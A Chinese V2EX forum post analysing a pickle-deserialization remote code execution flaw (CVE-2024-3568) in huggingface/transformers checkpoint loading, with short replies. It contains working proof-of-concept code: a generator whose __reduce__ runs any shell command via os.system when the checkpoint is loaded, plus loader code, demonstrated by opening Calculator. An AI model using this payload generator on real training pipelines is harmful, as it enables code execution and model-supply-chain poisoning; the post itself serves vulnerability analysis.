蹭热度:分析了一下这两天比较火的字节跳动实习生大模型训练集群投毒用到的漏洞的原理

12 小时 35 分钟前
 CC11001100

文章传送门: https://github.com/llm-sec/transformer-hacker/blob/main/docs/CVE-2024-3568/README.md

huggingface/transformers RCE 漏洞分析( CVE-2024-3568 )

一、缘起

刚开始研究大模型安全的时候就看到huggingface/transformers有这个load_repo_checkpoint的漏洞,不过当时看到说是利用起来比较困难就没有再深入研究(世上无难事,只要肯放弃),直到周五( 2024-10-18 )的时候,看到各个技术群里都在转发字节跳动实习生对大模型投毒的聊天记录,故事情节相当精彩刺激,后来在知乎热榜上也看到出现非常多的讨论,有兴趣的读者可自行吃瓜:

《字节跳动大模型训练被实习生恶意注入破坏代码,涉事者已被辞退,攻击带来的影响有多大?暴露出哪些问题? - 知乎》

既然这个漏洞都已经能够在实际环境中产生危害了,感觉是有必要深入了解分析一下了。

二、漏洞复现

前置条件:

借助这个工具来进行漏洞复现:

https://github.com/llm-sec/transformer-hacker

先生成一个带checkpoint的文件夹,执行的命令是Mac下的打开计算器命令:

python main.py --directory ./rce-checkpoint --model bert-base-uncased --command 'open /System/Applications/Calculator.app'

生成好了 payload 之后,然后执行下面的代码,用这段代码来模拟模型训练加载checkpoint的过程,在里面尝试加载生成的带有命令执行的checkpoint的仓库文件夹:

from tensorflow.keras.optimizers import Adam
from transformers import TFAutoModel

# 这个模型还是有些大的,下载可能会花一些时间...
# https://huggingface.co/google-bert/bert-base-uncased/tree/main
model = TFAutoModel.from_pretrained('bert-base-uncased')
model.compile(optimizer=Adam(learning_rate=5e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy'])

# 把参数修改为 checkpoint 所在的仓库的路径
model.load_repo_checkpoint('test_repo')

在被加载的时候就能够执行任意命令,但是这里我们只是为了证明能够执行而不想产生实际危害,所以我们只是弹出了一个计算器:

三、漏洞原理分析

从大的流程上来说,就是transformers允许从检查点恢复预训练的一些进度,而所谓的checkpoint检查点其实就是一个文件夹,结构大概是这样子的:

文件夹名称checkpoint是约定的固定的名称,下面的两个文件:

下面来看一下 poc 代码,追一下源代码看看漏洞到底是怎么产生的,可以看到是在TFAutoModelmodel.load_repo_checkpoint方法读取了有问题的checkpoint

from tensorflow.keras.optimizers import Adam
from transformers import TFAutoModel

# 这个模型还是有些大的,下载可能会花一些时间...
# https://huggingface.co/google-bert/bert-base-uncased/tree/main
model = TFAutoModel.from_pretrained('bert-base-uncased')
model.compile(optimizer=Adam(learning_rate=5e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy'])

# 把参数修改为 checkpoint 所在的仓库的路径,注意路径要正确
model.load_repo_checkpoint('rce-checkpoint')

让我们跟进去代码看一下,这个方法完整的实现是下面这样子,可以看到逻辑比较简单,下面我们将一段一段的分析它:

    def load_repo_checkpoint(self, repo_path_or_name):
        """
        Loads a saved checkpoint (model weights and optimizer state) from a repo. Returns the current epoch count when
        the checkpoint was made.

        Args:
            repo_path_or_name (`str`):
                Can either be a repository name for your {object} in the Hub or a path to a local folder (in which case
                the repository will have the name of that local folder).

        Returns:
            `dict`: A dictionary of extra metadata from the checkpoint, most commonly an "epoch" count.
        """
        if getattr(self, "optimizer", None) is None:
            raise RuntimeError(
                "Checkpoint loading failed as no optimizer is attached to the model. "
                "This is most likely caused by the model not being compiled."
            )
        if os.path.isdir(repo_path_or_name):
            local_dir = repo_path_or_name
        else:
            # If this isn't a local path, check that the remote repo exists and has a checkpoint in it
            repo_files = list_repo_files(repo_path_or_name)
            for file in ("checkpoint/weights.h5", "checkpoint/extra_data.pickle"):
                if file not in repo_files:
                    raise FileNotFoundError(f"Repo {repo_path_or_name} does not contain checkpoint file {file}!")
            repo = Repository(repo_path_or_name.split("/")[-1], clone_from=repo_path_or_name)
            local_dir = repo.local_dir

        # Now make sure the repo actually has a checkpoint in it.
        checkpoint_dir = os.path.join(local_dir, "checkpoint")
        weights_file = os.path.join(checkpoint_dir, "weights.h5")
        if not os.path.isfile(weights_file):
            raise FileNotFoundError(f"Could not find checkpoint file weights.h5 in repo {repo_path_or_name}!")
        extra_data_file = os.path.join(checkpoint_dir, "extra_data.pickle")
        if not os.path.isfile(extra_data_file):
            raise FileNotFoundError(f"Could not find checkpoint file extra_data.pickle in repo {repo_path_or_name}!")

        # Assuming the repo is real and we got a checkpoint, load the weights and the optimizer state into the model.
        # The optimizer state includes the iteration count, so learning rate schedules should resume as normal too.
        self.load_weights(weights_file)
        with open(extra_data_file, "rb") as f:
            extra_data = pickle.load(f)
        self.optimizer.set_weights(extra_data["optimizer_state"])

        # Finally, return the epoch number from the checkpoint. This isn't a property of the model, so we can't
        # set it directly, but the user can pass it to fit().
        return {"epoch": extra_data["epoch"]}

首先这部分是对模型自身的设置进行检查,这就要求模型使用的时候必须要配置了optimizer

        if getattr(self, "optimizer", None) is None:
            raise RuntimeError(
                "Checkpoint loading failed as no optimizer is attached to the model. "
                "This is most likely caused by the model not being compiled."
            )

所以我们的 poc 代码里也为模型配置了optimizer

model.compile(optimizer=Adam(learning_rate=5e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy'])

紧接着对传入的文件夹的合法性进行检查,比如必须是一个目录文件,必须存在checkpoint/weights.h5checkpoint/extra_data.pickle这两个文件:

        if os.path.isdir(repo_path_or_name):
            local_dir = repo_path_or_name
        else:
            # If this isn't a local path, check that the remote repo exists and has a checkpoint in it
            repo_files = list_repo_files(repo_path_or_name)
            for file in ("checkpoint/weights.h5", "checkpoint/extra_data.pickle"):
                if file not in repo_files:
                    raise FileNotFoundError(f"Repo {repo_path_or_name} does not contain checkpoint file {file}!")
            repo = Repository(repo_path_or_name.split("/")[-1], clone_from=repo_path_or_name)
            local_dir = repo.local_dir
            
        # Now make sure the repo actually has a checkpoint in it.
        checkpoint_dir = os.path.join(local_dir, "checkpoint")
        weights_file = os.path.join(checkpoint_dir, "weights.h5")
        if not os.path.isfile(weights_file):
            raise FileNotFoundError(f"Could not find checkpoint file weights.h5 in repo {repo_path_or_name}!")
        extra_data_file = os.path.join(checkpoint_dir, "extra_data.pickle")
        if not os.path.isfile(extra_data_file):
            raise FileNotFoundError(f"Could not find checkpoint file extra_data.pickle in repo {repo_path_or_name}!")

然后到重点了,紧接着加载了模型的权重文件,这里加载权重文件不正确的话就会抛出异常,走不到下一步,所以这就是为什么我们一定要生成正确的权重文件(针对权重文件的投毒后续会再出一片文章展开解释):

        # Assuming the repo is real and we got a checkpoint, load the weights and the optimizer state into the model.
        # The optimizer state includes the iteration count, so learning rate schedules should resume as normal too.
        self.load_weights(weights_file)

再然后,开始读取extra_data.pickle反序列化,就来到了我们熟悉的pickle.load(f)环节,在这一步,产生了 RCE:


        with open(extra_data_file, "rb") as f:
            extra_data = pickle.load(f)
        self.optimizer.set_weights(extra_data["optimizer_state"])

        # Finally, return the epoch number from the checkpoint. This isn't a property of the model, so we can't
        # set it directly, but the user can pass it to fit().
        return {"epoch": extra_data["epoch"]}

让我们来看一下这个extra_data.pickle文件是如何生成的,这里定义了一个类,然后为这个类创建了一个对象并dump到了硬盘上,在这个类上有一个特殊的__reduce__方法,在 pickle 的规范约定中,反序列化时会调用类上的__reduce__方法,所以就 RCE:

def generate_extra_data_pickle(filepath, command):
    """
    生成 extra_data.pickle 文件,这个文件被加载的时候会执行给定的命令
    :param filepath: extra_data.pickle 文件的位置
    :param command: 要执行的命令
    :return:
    """

    class CommandExecute:
        def __reduce__(self):
            """
            在 pickle.load(f) 的时候,此处的命令会被执行
            :return:
            """
            return os.system, (command,)

    poc = CommandExecute()
    with open(filepath, 'wb') as fp:
        pickle.dump(poc, fp)

官方的修复似乎是把这个方法删除掉了?草没看明白...

https://github.com/huggingface/transformers/commit/693667b8ac8138b83f8adb6522ddaf42fa07c125

四、影响范围 & 防御措施

五、参考链接

六、大模型安全技术交流群

扫码加入大模型安全交流群:

如群二维码过期,可以加我个人微信,发送 [大模型安全] 拉你进群:

1493 次点击
所在节点    程序员
3 条回复
allplay
3 小时 48 分钟前
TL ; DR 。
proxytoworld
2 小时 8 分钟前
你就知道他用的是这个漏洞针对几千张卡?
SomeBottle
43 分钟前
如果真的是这样的话,那主要问题还是 pickle 啊...
pickle 反序列化的代码执行漏洞似乎也披露有一会儿了,官方文档也有明确的警告,目前几个深度学习框架似乎也在着手解决这点,PyTorch 的 `torch.load` 文档中也有明确的警告信息。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1082008

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX